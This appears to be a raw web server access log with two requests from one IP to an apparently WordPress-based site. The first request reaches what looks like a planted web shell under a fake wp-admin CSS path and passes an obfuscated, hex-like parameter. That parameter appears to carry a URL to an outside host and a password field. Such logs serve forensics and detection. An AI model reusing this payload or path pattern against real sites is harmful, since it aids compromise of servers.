45.227.253.15 - - [16/Jun/2025:05:36:42 +0000] "GET /wp-admin/css/colors/sunrise/sunrise/index.php?ARRAY=7o2230223n313735303035353839322p2231223n22687474703n5p2s5p2s3230342r31322r3233382r37345p2s3s6p633q7068705s636s64655s6n6326743q313735303035323239322q3963343430393039353833636530633533373633353539393139623166343632222p2232223n223935626362663730336566393730656536613732346363336562326631336635222p2233223n223939323535386535633437393732656635333134396630376136326632646363222p2262696r675s70617373223n2232372q33352q35322q36372q37312q38342q3134227q HTTP/1.1" 200 95 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3790 Safari/537.36 Edg/78.0.142.6"
testerofmesquite.infinitibizsol.com:443
45.227.253.15 - - [16/Jun/2025:07:39:53 +0000] "GET /index.php/jk HTTP/1.1" 200 43 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.4.4 Mobile/15E148 Safari/604.1"
testerofmesquite.infinitibizsol.com:443
